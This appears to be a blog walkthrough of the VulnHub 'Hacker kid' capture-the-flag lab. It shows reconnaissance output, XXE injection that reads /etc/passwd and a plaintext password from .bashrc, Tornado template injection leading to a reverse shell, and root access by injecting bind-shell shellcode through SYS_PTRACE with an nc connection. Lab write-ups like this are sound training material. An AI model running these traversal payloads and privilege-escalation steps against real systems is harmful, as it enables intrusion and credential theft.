Home Vulnhub - Hacker kid 1.0.1
Post
Cancel
Preview Image

Vulnhub - Hacker kid 1.0.1

By yufongg
Posted 2022-02-14 Updated 2022-08-09 9 min read

Recon

NMAP Complete Scan 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

# Nmap 7.92 scan initiated Sun Feb 13 04:48:02 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Hacker_kid_1.0.1/192.168.110.28/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Hacker_kid_1.0.1/192.168.110.28/scans/xml/_full_tcp_nmap.xml 192.168.110.28
Nmap scan report for 192.168.110.28
Host is up, received arp-response (0.00045s latency).
Scanned at 2022-02-13 04:48:04 +08 for 21s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
53/tcp   open  domain  syn-ack ttl 64 ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Notorious Kid : A Hacker 
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
9999/tcp open  http    syn-ack ttl 64 Tornado httpd 6.1
| http-title: Please Log In
|_Requested resource was /login?next=%2F
| http-methods: 
|_  Supported Methods: GET POST
|_http-server-header: TornadoServer/6.1
MAC Address: 08:00:27:9A:3F:A1 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/13%OT=53%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=620
OS:81D1A%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 16.912 days (since Thu Jan 27 06:55:50 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.110.28

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 04:48:26 2022 -- 1 IP address (1 host up) scanned in 25.79 seconds

TCP/80 (HTTP)

FFUF - common.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.28/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

app.html                [Status: 200, Size: 8048, Words: 2070, Lines: 265]
cgi-bin/.php            [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/                [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/.html           [Status: 403, Size: 279, Words: 20, Lines: 10]
css                     [Status: 301, Size: 314, Words: 20, Lines: 10]
images                  [Status: 301, Size: 317, Words: 20, Lines: 10]
index.php               [Status: 200, Size: 3597, Words: 596, Lines: 113]
index.php               [Status: 200, Size: 3597, Words: 596, Lines: 113]
javascript              [Status: 301, Size: 321, Words: 20, Lines: 10]
form.html               [Status: 200, Size: 10219, Words: 2459, Lines: 248]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 4939 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
  • app.html
  • index.php
  • images
  • form.html
  • cgi-bin/

TCP/9999 (HTTP)

FFUF - common.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
└─# ffuf -u http://$ip:9999/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.28:9999/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php .cgi 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 302, Size: 0, Words: 1, Lines: 1]
login                   [Status: 200, Size: 452, Words: 21, Lines: 20]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1]
:: Progress: [23075/23075] :: Job [1/1] :: 829 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
  • login
  • logout

Nikto 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.110.28
+ Target Hostname:    192.168.110.28
+ Target Port:        9999
+ Start Time:         2022-02-13 04:56:50 (GMT8)
---------------------------------------------------------------------------
+ Server: TornadoServer/6.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /login?next=%2F
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-02-13 05:00:35 (GMT8) (225 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • TornadoServer/6.1
  • /login?next=%2F

Initial Foothold

TCP/9999 (HTTP) - Python Tornado Server

  1. Proceed to login
    • login?next=&2F
  2. Attempted to exploit login?next=&2F
    • LFI
    • Command Injection
    • Attempt SQLi
    • All Failed
  3. Managed to trigger an error
  4. What is TornadoServer

    Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.

  5. Find exploits for TornadoServer/6.1

    ExploitURL
    SSTI (Server Side Template Injection) https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/
    SSTI (Server Side Template Injection) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
  6. Attempt SSTI
    • Did not work, we might have to obtain a valid credential and login before we can exploit this vulnerability

TCP/80 (HTTP) - Fuzz GET Parameter

  1. Directory enumerate cgi-bin/FUZZ
    • Did not find any .cgi files
  2. View enumerated directories
    • app.html
      • Could not find any vulnerabilities
    • index.php
      • GET parameter: ?page_no
    • form.html
      • Could not find any vulnerabilities
  3. Enumerate page_no GET parameter
    • Setup
    • Results
  4. Add hackers.blackhat.local to /etc/hosts
    1

     echo "192.168.110.28 hackers.blackhat.local" >> /etc/hosts

TCP/80 (HTTP) - DNS Enumeration

  1. Enumerate subdomains w/ dig, dig command in Linux is used to gather DNS information
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
 └─# dig hackers.blackhat.local @$ip

 ; <<>> DiG 9.18.0-2-Debian <<>> hackers.blackhat.local @192.168.110.28
 ;; global options: +cmd
 ;; Got answer:
 ;; WARNING: .local is reserved for Multicast DNS
 ;; You are currently testing what happens when an mDNS query is leaked to DNS
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34032
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

 ;; OPT PSEUDOSECTION:
 ; EDNS: version: 0, flags:; udp: 4096
 ; COOKIE: c00738aff09f1cee0100000062089d0bf24fa6beb3cfd099 (good)
 ;; QUESTION SECTION:
 ;hackers.blackhat.local.		IN	A

 ;; AUTHORITY SECTION:
 blackhat.local.		3600	IN	SOA	blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600

 ;; Query time: 0 msec
 ;; SERVER: 192.168.110.28#53(192.168.110.28) (UDP)
 ;; WHEN: Sun Feb 13 05:54:20 +08 2022
 ;; MSG SIZE  rcvd: 125
    • hackerkid.blackhat.local
  2. Add hackerkid.blackhat.local to /etc/hosts
    1
2

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
 └─# echo "192.168.110.28 hackerkid.blackhat.local" >> /etc/hosts
  3. Proceed to hackerkid.blackhat.local

TCP/80 (HTTP) - XXE Injection

  1. Submit a form, intercept it w/ burp
    • The request is in XML format.
    • The email field is reflected back, we can try XXE injection in the email field.
    • Payload
  2. Attempt to do XXE Injection in the email field
  3. Obtain users in /etc/passwd
    1
2
3

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit]
 └─# cat passwd | awk -F: '($3>=1000)&&($1!="nobody"){print $1}'
 saket
    • saket
  4. Include files in saket’s home directory
    • .bashrc, .bash_history
      • failed
  5. Instead, use PHP Wrapper to view the files
    • .bash_history
    • .bashrc
  6. Decoded
    1
2
3
4
5
6

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit]
 └─# base64 -d encoded_bashrc.txt 
 SNIP
 #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"
    • admin:Saket!#$%@!!

TCP/9999 (HTTP) - SSTI

  1. Login w/ admin:Saket!#$%@!!, failed
  2. Login w/ saket:Saket!#$%@!!
  3. Fuzz for vulnerabilities
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit]
 └─# ffuf -u http://192.168.110.28:9999/?W1=W2 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt:W1 -w /usr/share/wordlists/LFI/file_inclusion_linux.txt:W2 -H 'Cookie: _xsrf=2|e138688c|df38105665c8988ec4ff6530f419a2fb|1644728769; user="2|1:0|10:1644767656|4:user|8:c2FrZXQ=|953dbb527b615cab4e0506589c0196f949dda3f2a5da54595de6f7e06f634569"; incorrect="2|1:0|10:1644767656|9:incorrect|4:MA==|5bd1a9396865cb7a0745567ff013abea8fdc3182995d897fb284520b39005898"' -fw 21

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       

        v1.3.1 Kali Exclusive <3
 ________________________________________________

  :: Method           : GET
  :: URL              : http://192.168.110.28:9999/?W1=W2
  :: Wordlist         : W1: /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt
  :: Wordlist         : W2: /usr/share/wordlists/LFI/file_inclusion_linux.txt
  :: Header           : Cookie: _xsrf=2|e138688c|df38105665c8988ec4ff6530f419a2fb|1644728769; user="2|1:0|10:1644767656|4:user|8:c2FrZXQ=|953dbb527b615cab4e0506589c0196f949dda3f2a5da54595de6f7e06f634569"; incorrect="2|1:0|10:1644767656|9:incorrect|4:MA==|5bd1a9396865cb7a0745567ff013abea8fdc3182995d897fb284520b39005898"
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403,405
  :: Filter           : Response words: 21
 ________________________________________________

 [Status: 200, Size: 274, Words: 10, Lines: 19]
     * W1: name
     * W2: %00../../../../../../etc/passwd

 [Status: 200, Size: 274, Words: 10, Lines: 19]
     * W2: %00../../../../../../etc/shadow
     * W1: name

 [Status: 200, Size: 240, Words: 10, Lines: 19]
     * W1: name
     * W2: %00/etc/passwd%00

    • ?name=<SSTI Payload>

  4. Exploits we found earlier

    ExploitURL
    SSTI (Server Side Template Injection) https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/
    SSTI (Server Side Template Injection) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
  5. Attempt SSTI
  6. URL Encode reverse shell payload
  7. Obtain shell

Privilege Escalation

Root - Via Linux Capabilities (SYS_PTRACE)

  1. Linpeas
  2. Exploiting sys_ptrace
  3. Find a process running as root
    1
2
3
4

     saket@ubuntu:/tmp$ ps aux | grep root
 ...
 root         766  0.0  0.4 199780  4728 ?        Ss   20:15   0:00 /usr/sbin/apache2 -k start
 ...
    • PID 766
  4. Download a bindshell shellcode payload
    • This will start a bind shell at TCP/5600
  5. Downloadinject.py exploit
  6. Add bindshell shellcode at Line 70
  7. Run inject.py specifying PID 766
    1
2
3
4
5

    saket@ubuntu:/tmp$ /usr/bin/python2.7 inject.py 766
Instruction Pointer: 0x7f1554d1d0daL
Injecting Shellcode at: 0x7f1554d1d0daL
Shellcode Injected!!
Final Instruction Pointer: 0x7f1554d1d0dcL
  8. Obtain root shell
    1
2
3
4

     ┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit]
 └─# nc 192.168.110.28 5600
 id
 uid=0(root) gid=0(root) groups=0(root)

  9. Alternative
    1

    saket@ubuntu:/tmp$ for x in {1..1000}; do /usr/bin/python2.7 inject.py $x; done

Vulnhub, Linux
exploit/xxe-injection exploit/ssti linux-priv-esc/capabilities-exploit
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Vulnhub - Pinky's Palace v1

Vulnhub - eLection 1

Comments powered by Disqus.